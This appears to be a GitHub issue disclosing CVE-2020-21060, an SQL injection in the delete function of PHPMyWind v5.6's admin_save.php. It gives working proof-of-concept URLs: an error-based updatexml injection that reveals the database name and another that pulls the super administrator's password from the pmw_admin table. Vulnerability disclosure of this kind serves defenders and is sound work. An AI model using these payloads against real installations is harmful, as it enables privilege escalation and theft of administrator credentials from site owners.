Headline
CVE-2020-21060: sql injection exists many places in PHPMyWind v5.6 · Issue #10 · gaozhifeng/PHPMyWind
SQL injection vulnerability found in PHPMyWind v.5.6 allows a remote attacker to gain privileges via the delete function of the administrator management page.
Product Homepage:http://phpmywind.com/
hello!
I found a serious SQL injection vulnerability in the backend management system(/admin/admin_save.php) of PHPMyWind v5.6
This vulnerability allows low-privilege site administrators to gain access to super-administrator accounts and passwords
Vulnerability validation:
First, there are three types of administrators in the current system: super administrators, site administrators, and article publishers
Now to the site administrator login background management system, click the administrator management, and then “delete function” is the location of the vulnerability
it’s url is http://127.0.0.1/admin/admin_save.php?action=del&id=4
POC
(1)
http://127.0.0.1/admin/admin_save.php?action=del&id=4%27
(2)show the current database
http://127.0.0.1/admin/admin_save.php?action=del&id=4%20%20and%20id%20in%20(char(@`%27`),updatexml(1,concat(0x7e,(select%20database())),1),char(@`%27`))
(3) Query out the super administrator password
http://127.0.0.1/admin/admin_save.php?action=del&id=4 and id in (char(@`'`),updatexml(1,concat(0x7e,(select password from pmw_admin limit 0,1)),1),char(@`'`))
This vulnerability allows you to query the database for any data you want